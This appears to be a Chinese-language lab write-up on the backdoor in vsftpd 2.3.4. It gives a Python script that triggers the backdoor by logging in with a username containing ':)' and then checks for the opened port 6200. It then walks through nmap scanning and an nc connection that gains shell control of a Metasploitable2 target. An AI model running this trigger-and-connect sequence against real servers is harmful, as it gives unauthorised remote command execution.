1 漏洞简介
笑脸漏洞是vsftpd 2.3.4版本中开发者在软件里留下的后门漏洞,因为在登录时输入符号:)即可使服务开启6200端口,直接执行系统命令,符号酷似笑脸,因此称为笑脸漏洞。
笑脸漏洞的代码如图:


2 检测代码
import socket
from ftplib import FTP
url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)' # 用户名必须包含:)这两个字符
password = 'anonymous' # 密码随便啥都行
try:
ftp.connect(url, 21, timeout=2) # 使用ftp登录,设置延时2秒
ftp.login(username, password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket() # 使用socket函数来检测是否有漏洞存在
s.connect((url, 6200))
s.close()
print("发现微笑漏洞")
except:
print("没有发现笑脸漏洞")
要在kali里面运行python文件,从而扫描得到结果。
3 复现准备
- 首先,要打开靶机Metasploitable2
- 其次准备好攻击机kali
4 复现过程
- 首先利用nmap进行探测,找到靶机ip。

- 得到ip后,nmap扫描端口。

- 探测到靶机21端口开放且版本是vsftpd 2.3.4,接着检测6200端口是否开放。

- 检测到6200端口关闭,使用命令ftp+ip打开端口。

- 尽管没有返回,但是我们可以通过新开的控制窗口查看到6200端口已打开。

- 打开后,我们便可以通过nc(瑞士军刀)连接靶机从而获得靶机的控制权,完成复现。


1万+

被折叠的 条评论
为什么被折叠?



